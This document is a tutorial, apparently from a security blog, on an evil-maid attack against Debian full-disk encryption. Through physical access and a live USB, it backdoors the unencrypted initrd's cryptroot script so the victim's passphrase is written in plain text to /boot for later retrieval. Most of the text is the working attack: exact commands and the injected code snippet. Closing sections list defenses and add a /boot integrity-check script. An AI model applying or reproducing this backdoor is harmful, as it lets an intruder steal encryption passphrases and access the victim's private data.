Bypass Disk Encryption Linux
We are going to learn how to steal the passphrase of a drive encrypted with the default setup of a Debian distribution.
How? Through physical intrusion!
The general idea is simple. By default, disk encryption on Debian (and many other distributions) doesn't encrypt the /boot directory. Even if full disk encryption is available via Grub2…
To perform this attack, we are going to use a Live USB on the target machine. Using the live USB, we are going to modify the script that asks for the passphrase (located in /boot) to make it write, in a text file, the passphrase typed by the victim. The next time the victim decrypts the disk, the passphrase is written in plain text on a partition accessible by the attacker.
Requirements:
- debian-live on a USB key
- The ability to boot the target machine on the live USB
- 2 physical accesses to the target machine (one to deploy, one to retrieve the plain text passphrase)
For this example:
Victim: a Debian stretch named “vict” with a disk encrypted with the default setup of the Debian installer. It means that the /boot partition will be unencrypted.
Attacker: a debian-live named “hack” on a USB key
⚠️ In this example the initrd file will be initrd.img-3.16.0-6-amd64: the 3.16.0-6-amd64 part of the file name is specific to the kernel version, so it will differ on another kernel. ⚠️
- The attacker inserts the USB key “hack” in the “vict” machine.
- The attacker boots “vict” on the debian-live “hack”.
If you want to use an AZERTY keyboard layout:
$ setxkbmap fr
Switch to root. #HackTheWorld
Mount the unencrypted /boot partition of “vict” in the /mnt directory of “hack”:
$ mount /dev/sda1 /mnt
Friendly reminder: “vict” is a Debian system. Look in /mnt and check that the content is consistent with a /boot partition (files/directories like
Create a work directory at the file system root:
$ mkdir /work
We are working outside the /boot partition because it is very limited in space (236 MB).
Copy the file whose name begins with initrd.img- (in Arch it is initramfs-linux.img) into the work directory. Make sure to remember the original name of the file you are copying.
$ cp /mnt/initrd.img-3.16.0-6-amd64 /work/
The initrd.img-3.16.0-6-amd64 file is a gzip archive. To be able to decompress it, rename it by adding the .gz extension to the name:
$ cd /work && mv initrd.img-3.16.0-6-amd64 initrd.img-3.16.0-6-amd64.gz
$ gzip -d initrd.img-3.16.0-6-amd64.gz
You will get a file named initrd.img-3.16.0-6-amd64. This file is a CPIO archive. Extract it:
$ cpio -i < initrd.img-3.16.0-6-amd64
Now you have a minimal file system.
But why? What is this initrd file?
Initrd stands for Initial RAM Disk. It is the file that is loaded into RAM at system boot. It gives the OS a minimal file system with the essential binaries that allow it to mount the main file system.
We need to find the decryption script. To find it, grep a piece of the message displayed when you have to unlock the disk.
$ rgrep "Please unlock disk"
You may get multiple files in the results. If that is the case, it is up to you to identify the right one. Here, the right one is scripts/local-top/cryptroot. Search for the pattern “cryptsetup failed, bad password or option?” and find the beginning of the while loop that contains the “cryptsetup failed” message:
while [ $crypttries -le 0 ] || [ $count -lt $crypttries ]; do
Right before the while loop, insert:
##HACK BEGIN
zer=$($cryptkeyscript "$cryptkey")
mkdir oklm
mount -t ext2 -o rw /dev/sda1 oklm
echo $zer >> oklm/.kernel_option.tmp
umount oklm
##HACK END
This code writes the passphrase submitted by the victim to .kernel_option.tmp in the /boot partition of “vict”.
Delete the CPIO initrd file decompressed earlier in the /work directory. Then create a new CPIO initrd file containing the malicious code:
$ find . | cpio -H newc -o > ../initrd.img-3.16.0-6-amd64
Make sure that, in the above command, you used the original CPIO filename.
The new CPIO file will be created outside the work directory.
Compress the new CPIO file in gzip:
$ gzip ../initrd.img-3.16.0-6-amd64
Move the new initrd.img-3.16.0-6-amd64.gz file to /mnt (the boot partition of “vict”) and remove the .gz extension from the file name:
$ mv ../initrd.img-*.gz /mnt/initrd.img-3.16.0-6-amd64
Make sure to remove the extension, so that the original initrd file is replaced by the backdoored one.
Unmount the /boot partition mounted in /mnt:
$ cd && umount /mnt
Shut down the machine.
Wait until the victim has unlocked their disk at least once, then insert the USB key “hack” in the victim's machine. Boot on “hack” and:
$ mount /dev/sda1 /mnt
Check out the stolen passphrase
$ cat /mnt/.kernel_option.tmp
Tadam! You have successfully stolen a passphrase.
To protect yourself against this attack:
- Set a BIOS password.
- Disable booting from USB key, CD, network or any external device.
- Encrypt your /boot with Grub2! There are many tutorials online to do it, but I recommend this one.
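Whatever you choose above, it helps to be able to tell whether /boot has been touched between two boots. The following script is an added example, not part of the original post: it records a SHA-256 manifest of the files in an unencrypted /boot and later reports any modified, missing or new file, which is exactly what a rebuilt initrd.img-* or a dropped .kernel_option.tmp looks like. It assumes GNU coreutils (sha256sum), find, sort and diff, and that the manifest is stored somewhere the /boot partition cannot reach (another encrypted volume, a USB key you keep with you, or a remote host), since anything left in /boot can be rewritten along with the initrd.

```shell
#!/bin/sh
# Added example (not from the original post): baseline and re-check an
# unencrypted /boot partition. Assumes GNU sha256sum, find, sort, diff.
# Keep the manifest OFF the checked partition.

# Print "hash  ./path" for every regular file under $1, sorted by path.
boot_manifest() {
    dir=$1
    ( cd "$dir" && find . -type f -exec sha256sum {} + | LC_ALL=C sort -k2 )
}

# Recompute the manifest for $1 and compare it with the stored one in $2.
# Returns 0 when nothing changed; otherwise prints the differences and
# returns 1. A rebuilt initrd.img-* shows up as a changed hash, a file
# added next to it (such as .kernel_option.tmp) as a new "+" line.
boot_verify() {
    dir=$1
    manifest=$2
    if boot_manifest "$dir" | diff -u "$manifest" -; then
        echo "boot_verify: $dir matches $manifest"
        return 0
    fi
    echo "boot_verify: $dir differs from $manifest, do not enter the passphrase" >&2
    return 1
}

# Typical use, from your own trusted live system with /boot mounted on /mnt:
#   boot_manifest /mnt > /media/usb/boot.sha256   # once, after a trusted install
#   boot_verify   /mnt /media/usb/boot.sha256     # before unlocking the disk
```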
Automated versions of this attack exist; one of them is the “Evil Abigail” tool. You can find it here.